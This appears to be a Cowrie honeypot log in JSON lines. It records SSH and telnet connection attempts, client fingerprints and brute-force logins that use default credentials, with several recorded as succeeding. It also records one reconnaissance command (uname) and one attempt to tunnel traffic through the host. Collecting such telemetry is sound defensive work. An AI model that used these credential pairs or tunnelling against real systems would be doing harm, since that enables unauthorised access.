{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:24:57.400503Z","src_ip":"217.154.1.158","session":"2acc9ee72205"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:24:57.445677Z","src_ip":"217.154.1.158","session":"2acc9ee72205"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:24:58.461879Z","src_ip":"217.154.1.158","session":"2acc9ee72205"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38152,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e719b10f2f7","protocol":"ssh","message":"New connection: 217.154.1.158:38152 (1.2.3.4:22) [session: 1e719b10f2f7]","sensor":"my-vps","timestamp":"2025-08-26T20:25:14.586195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:25:14.587335Z","src_ip":"217.154.1.158","session":"1e719b10f2f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:25:14.601417Z","src_ip":"217.154.1.158","session":"1e719b10f2f7"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T20:25:14.645434Z","src_ip":"217.154.1.158","session":"1e719b10f2f7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:25:15.661005Z","src_ip":"217.154.1.158","session":"1e719b10f2f7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59348,"dst_ip":"1.2.3.4","dst_port":22,"session":"97359c22ae20","protocol":"ssh","message":"New connection: 217.154.1.158:59348 (1.2.3.4:22) [session: 97359c22ae20]","sensor":"my-vps","timestamp":"2025-08-26T20:25:31.803958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:25:31.804820Z","src_ip":"217.154.1.158","session":"97359c22ae20"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:25:31.820284Z","src_ip":"217.154.1.158","session":"97359c22ae20"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:25:31.919176Z","src_ip":"217.154.1.158","session":"97359c22ae20"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:25:32.935567Z","src_ip":"217.154.1.158","session":"97359c22ae20"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52058,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f63cdd7432","protocol":"ssh","message":"New connection: 217.154.1.158:52058 (1.2.3.4:22) [session: 19f63cdd7432]","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.772278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.773500Z","src_ip":"217.154.1.158","session":"19f63cdd7432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33046,"dst_ip":"1.2.3.4","dst_port":22,"session":"553a01aaa12c","protocol":"ssh","message":"New connection: 212.227.125.160:33046 (1.2.3.4:22) [session: 553a01aaa12c]","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.779327Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.780371Z","src_ip":"212.227.125.160","session":"553a01aaa12c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.787811Z","src_ip":"217.154.1.158","session":"19f63cdd7432"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.833883Z","src_ip":"217.154.1.158","session":"19f63cdd7432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33335,"dst_ip":"1.2.3.4","dst_port":22,"session":"66ee61ac76de","protocol":"ssh","message":"New connection: 212.227.125.160:33335 (1.2.3.4:22) [session: 66ee61ac76de]","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.893742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:25:48.894487Z","src_ip":"212.227.125.160","session":"66ee61ac76de"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T20:25:49.009210Z","src_ip":"212.227.125.160","session":"66ee61ac76de"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:25:49.353587Z","src_ip":"212.227.125.160","session":"66ee61ac76de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T20:25:49.469308Z","session":"66ee61ac76de"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:25:49.857590Z","src_ip":"217.154.1.158","session":"19f63cdd7432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40530,"dst_ip":"1.2.3.4","dst_port":23,"session":"c588eb32a1df","protocol":"telnet","message":"New connection: 212.227.235.229:40530 (1.2.3.4:23) [session: c588eb32a1df]","sensor":"my-vps","timestamp":"2025-08-26T20:25:59.388668Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:25:59.596434Z","src_ip":"212.227.235.229","session":"c588eb32a1df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:25:59.685834Z","src_ip":"212.227.235.229","session":"c588eb32a1df"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60972,"dst_ip":"1.2.3.4","dst_port":22,"session":"268e2aea6370","protocol":"ssh","message":"New connection: 217.154.1.158:60972 (1.2.3.4:22) [session: 268e2aea6370]","sensor":"my-vps","timestamp":"2025-08-26T20:26:05.973019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:26:05.973971Z","src_ip":"217.154.1.158","session":"268e2aea6370"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:26:05.987954Z","src_ip":"217.154.1.158","session":"268e2aea6370"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:06.035371Z","src_ip":"217.154.1.158","session":"268e2aea6370"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:07.051791Z","src_ip":"217.154.1.158","session":"268e2aea6370"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25272,"dst_ip":"1.2.3.4","dst_port":22,"session":"386bd3114109","protocol":"ssh","message":"New connection: 212.227.235.229:25272 (1.2.3.4:22) [session: 386bd3114109]","sensor":"my-vps","timestamp":"2025-08-26T20:26:08.093420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:26:08.094285Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:26:08.220075Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nosoup4u","message":"login attempt [admin/nosoup4u] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:08.806549Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234qwer","message":"login attempt [admin/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:09.934552Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4R2018","message":"login attempt [admin/1q2w3e4R2018] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:11.063092Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Pass@123","message":"login attempt [admin/Pass@123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:12.191824Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.login.failed","username":"admin","password":"112233","message":"login attempt [admin/112233] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:13.320982Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:14.448854Z","src_ip":"212.227.235.229","session":"386bd3114109"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56026,"dst_ip":"1.2.3.4","dst_port":22,"session":"50dd51c21c5d","protocol":"ssh","message":"New connection: 217.72.205.35:56026 (1.2.3.4:22) [session: 50dd51c21c5d]","sensor":"my-vps","timestamp":"2025-08-26T20:26:16.538468Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:16.539690Z","src_ip":"217.72.205.35","session":"50dd51c21c5d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42894,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaae00f96190","protocol":"ssh","message":"New connection: 217.154.1.158:42894 (1.2.3.4:22) [session: aaae00f96190]","sensor":"my-vps","timestamp":"2025-08-26T20:26:22.980389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:26:22.981583Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:26:23.019251Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:26:23.062846Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:26:23.109789Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:26:23.110480Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:23.125916Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:23.126928Z","src_ip":"217.154.1.158","session":"aaae00f96190"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51072,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1db2eedd3d3","protocol":"ssh","message":"New connection: 217.154.1.158:51072 (1.2.3.4:22) [session: e1db2eedd3d3]","sensor":"my-vps","timestamp":"2025-08-26T20:26:40.155607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:26:40.156333Z","src_ip":"217.154.1.158","session":"e1db2eedd3d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:26:40.170798Z","src_ip":"217.154.1.158","session":"e1db2eedd3d3"}
